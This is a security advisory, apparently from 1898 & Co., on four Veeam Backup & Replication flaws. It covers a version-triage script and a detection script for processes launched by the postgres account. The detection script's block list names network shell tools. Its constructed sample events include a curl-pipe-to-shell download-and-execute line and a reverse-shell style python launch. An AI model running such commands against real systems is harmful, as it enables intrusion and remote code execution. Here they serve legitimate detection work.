Critical Vulnerabilities in Veeam Backup & Replication Software
Veeam has released security updates addressing multiple vulnerabilities in its Backup & Replication software, including a critical flaw that can lead to remote code execution (RCE). The most severe, tracked as CVE-2025-59470 with a CVSS score of 9.0, allows a user holding the Backup Operator or Tape Operator role to execute code as the postgres user by sending a malicious interval or order parameter. Because the attacker must already hold one of these Veeam roles, the flaw is reachable by a malicious insider or by anyone who has compromised an operator account, which is why membership of these roles needs to be tightly controlled.
Three further significant flaws were fixed in the same release: CVE-2025-55125, RCE as root via a malicious backup configuration file; CVE-2025-59468, RCE as the postgres user via a malicious password parameter; and CVE-2025-59469, an arbitrary file write as root. All four affect Veeam Backup & Replication 13.0.1.180 and earlier.
Veeam has fixed these issues in build 13.0.1.1071. There is currently no evidence of exploitation in the wild, but earlier Veeam Backup & Replication vulnerabilities have been exploited by ransomware operators, so these updates should be applied promptly. Organizations should also follow Veeam's Security Guidelines to reduce the attack surface of the backup server.
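When triaging an estate against the two build numbers above, the first mistake to avoid is comparing builds as strings: "13.0.1.180" sorts after "13.0.1.1071" lexicographically, so a naive check reports the vulnerable build as patched. The script below is an added example for this advisory, not Veeam's tooling; it takes the affected and fixed builds from the text, treats builds between them (which the text does not mention) as still needing the update (an assumption), and runs over a constructed inventory rather than real hosts.

```python
"""Classify Veeam Backup & Replication build numbers against this advisory.

Added, illustrative script; not Veeam's own tooling. The two build numbers
are the ones quoted in the advisory; SAMPLE_INVENTORY is constructed data.
"""
from __future__ import annotations

AFFECTED_MAX = "13.0.1.180"   # advisory: this build and earlier are affected
FIXED_MIN = "13.0.1.1071"     # advisory: first build containing the fixes


def parse_build(build: str) -> tuple[int, ...]:
    """Turn '13.0.1.1071' into (13, 0, 1, 1071) so comparison is numeric.

    Raises ValueError for anything that is not dotted integers, so a typo in
    an inventory field fails loudly instead of silently sorting somewhere.
    """
    parts = build.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"not a dotted numeric build: {build!r}")
    return tuple(int(p) for p in parts)


def naive_is_patched(build: str) -> bool:
    """The wrong way: plain string comparison, kept only to show the pitfall.

    '13.0.1.180' >= '13.0.1.1071' is True as strings because '8' > '0' at
    the first differing character, yet 180 is the older build.
    """
    return build >= FIXED_MIN


def classify(build: str) -> str:
    """Return 'patched', 'vulnerable' or 'unknown-update'.

    'unknown-update' covers builds newer than 13.0.1.180 but older than
    13.0.1.1071, which the advisory does not mention. Assumption: treat them
    as needing the update until the vendor says otherwise.
    """
    v = parse_build(build)
    if v >= parse_build(FIXED_MIN):
        return "patched"
    if v <= parse_build(AFFECTED_MAX):
        return "vulnerable"
    return "unknown-update"


def triage(inventory: dict[str, str]) -> dict[str, list[str]]:
    """Group hostnames by status; hostnames are sorted inside each bucket."""
    buckets: dict[str, list[str]] = {"vulnerable": [], "unknown-update": [], "patched": []}
    for host, build in inventory.items():
        buckets[classify(build)].append(host)
    for hosts in buckets.values():
        hosts.sort()
    return buckets


# Constructed sample inventory (hostname -> reported build); not real hosts.
SAMPLE_INVENTORY = {
    "vbr-01.lab": "13.0.1.180",
    "vbr-02.lab": "13.0.1.1071",
    "vbr-03.lab": "12.3.2.3617",
    "vbr-04.lab": "13.0.1.500",
}

if __name__ == "__main__":
    for status, hosts in triage(SAMPLE_INVENTORY).items():
        print(f"{status:15} {', '.join(hosts) or '-'}")
```

Feed `triage()` whatever your CMDB or agent reports as the installed build; anything not in the `patched` bucket goes on the upgrade list.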
Threats and Vulnerabilities
CVE-2025-59470 is the critical issue. It requires an account holding the Backup Operator or Tape Operator role, but in exchange gives code execution as the postgres user, the account that runs the backup server's PostgreSQL configuration database. That is enough to read or tamper with the backup server's configuration and to pivot further on the host, threatening the integrity and availability of the backups themselves. The CVSS score of 9.0 reflects that impact.
CVE-2025-55125 allows RCE as root by supplying a crafted backup configuration file. Root on the backup server means full control of the host and of every backup it protects, so this flaw is as serious as the critical one in practice, despite the different entry point.
CVE-2025-59468 yields RCE as the postgres user through a malicious password parameter, with the same database-level consequences as CVE-2025-59470: unauthorized reading or manipulation of the backup server's configuration data.
CVE-2025-59469 allows an arbitrary file write as root. A root file write is routinely converted into root code execution (for example by writing a cron entry, a systemd unit or a startup script), so it should be prioritized as if it were root RCE rather than treated as a lesser issue.
Client Impact
If exploited, these vulnerabilities can lead to unauthorized access to sensitive backup data, destruction or encryption of backups, and prolonged downtime. Backup servers are a prime target precisely because destroying or corrupting backups removes the victim's recovery path, which is why ransomware operators have targeted Veeam deployments before. Organizations may face financial loss from downtime or breach response, and reputational damage if customer data is compromised.
From a compliance perspective, an incident involving the backup server can expose every dataset it holds, which is a significant problem for industries with strict data protection requirements. Failing to remediate promptly may lead to audits or penalties under regulations such as GDPR or HIPAA.
Mitigations
To mitigate the risks associated with these vulnerabilities, clients should take the following actions:
- Upgrade every Backup & Replication server to build 13.0.1.1071 or later, and verify the installed build afterwards rather than relying on the update job's reported status.
- Review Backup Operator and Tape Operator role assignments in the console's Users and Roles settings; remove accounts that do not need them, avoid shared operator accounts, and treat the remaining accounts as privileged (strong unique credentials and multi-factor authentication on console access).
- Implement Veeam's Security Guidelines for the backup server, in particular isolating it from general-purpose networks and limiting who can reach its management interfaces.
- Conduct regular security audits and vulnerability assessments so that the backup infrastructure is not left out of routine patch tracking.
- Monitor backup servers for signs of exploitation: shells, interpreters or download tools running as the postgres or root user, unexpected changes to backup configuration files, and new files appearing in root-owned locations.
Taken together, these steps materially reduce exposure to these flaws and improve the overall security posture of the backup environment. Clients should remain vigilant about applying security updates promptly and maintaining tight control over role assignments and system monitoring.
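The last bullet translates directly into a detection rule: the PostgreSQL server launches only its own helper processes, so a shell, interpreter or download tool running as the postgres account on a backup server is a strong signal of the postgres-level RCE flaws above being used. The following is an added example for this advisory, not a vendor rule set. It assumes process-creation events arrive as one JSON object per line with the fields `ts`, `host`, `user`, `image` and `cmdline` (adapt to your EDR or auditd export), the sample events are constructed, and the allowlisted `archive_command` prefix is a placeholder to be replaced with the real value from the server's `postgresql.conf`.

```python
"""Flag shell, interpreter and download-tool launches by the postgres account.

Added, illustrative detection logic; not Veeam's or any vendor's rule set.
Assumptions: one JSON process-creation event per line with ts, host, user,
image and cmdline fields; SAMPLE_EVENTS are constructed, not real telemetry.
"""
from __future__ import annotations

import json
from typing import Iterable

# Binaries the PostgreSQL service account has no normal reason to run.
SUSPICIOUS_BINARIES = frozenset({
    "sh", "bash", "dash", "zsh", "python3", "perl",
    "curl", "wget", "nc", "ncat", "socat",
})

# Known-good command lines. PostgreSQL does run its archive_command through
# /bin/sh, so a blanket "postgres spawned sh" rule false-positives wherever
# WAL archiving is configured. Assumption: this prefix is a placeholder;
# populate it from the server's own postgresql.conf.
ALLOWED_CMDLINE_PREFIXES = ("sh -c cp pg_wal/",)


def basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def is_suspicious(event: dict) -> bool:
    """True when the postgres account launches a binary it should never run."""
    if event.get("user") != "postgres":
        return False
    if basename(event.get("image", "")) not in SUSPICIOUS_BINARIES:
        return False
    return not event.get("cmdline", "").startswith(ALLOWED_CMDLINE_PREFIXES)


def scan(lines: Iterable[str]) -> list[dict]:
    """Return one alert per suspicious event; blank and malformed lines are skipped."""
    alerts: list[dict] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # do not let a broken line abort the whole scan
        if is_suspicious(event):
            alerts.append({"ts": event.get("ts"), "host": event.get("host"),
                           "cmdline": event.get("cmdline")})
    return alerts


# Constructed sample events: a normal postgres worker, a legitimate WAL
# archive command, a download-and-execute as postgres, a root-run script
# (out of scope for this rule), a reverse-shell style python launch, and junk.
SAMPLE_EVENTS = [
    '{"ts":"2025-11-03T09:12:01Z","host":"vbr-01.lab","user":"postgres","image":"/usr/bin/postgres","cmdline":"postgres: checkpointer"}',
    '{"ts":"2025-11-03T09:12:05Z","host":"vbr-01.lab","user":"postgres","image":"/bin/sh","cmdline":"sh -c cp pg_wal/000000010000000000000042 /var/lib/wal-archive/"}',
    '{"ts":"2025-11-03T09:13:44Z","host":"vbr-01.lab","user":"postgres","image":"/bin/sh","cmdline":"sh -c curl -s http://203.0.113.7/a | sh"}',
    '{"ts":"2025-11-03T09:13:50Z","host":"vbr-01.lab","user":"root","image":"/bin/bash","cmdline":"bash /usr/local/bin/rotate-logs.sh"}',
    '{"ts":"2025-11-03T09:14:02Z","host":"vbr-01.lab","user":"postgres","image":"/usr/bin/python3","cmdline":"python3 -c import socket,os,pty"}',
    'not json at all',
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(f"{alert['ts']} {alert['host']} postgres ran: {alert['cmdline']}")
```

The rule deliberately does not alert on root shells: pre- and post-job scripts may legitimately run as root on a backup server, so a root-level rule needs parent-process context (which service spawned the shell) rather than the user alone. Extend the event schema with a parent image field before adding that case.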
1898 & Co. Response
1898 & Co. is actively addressing the current threat landscape by offering specialized services designed to help clients secure their Veeam Backup & Replication environments. Our team provides tailored vulnerability assessment services to identify and mitigate risks associated with these newly discovered flaws.
We are updating our security protocols to incorporate the latest threat intelligence and best practices for managing privileged roles within organizations. Our collaborative efforts with industry allies and government agencies ensure that we remain at the forefront of cybersecurity developments.
Our ongoing research and threat intelligence gathering activities enable us to provide clients with timely insights into emerging threats and effective mitigation strategies. We have successfully assisted numerous clients in implementing robust security measures that protect against similar vulnerabilities, demonstrating our commitment to delivering high-quality cybersecurity solutions.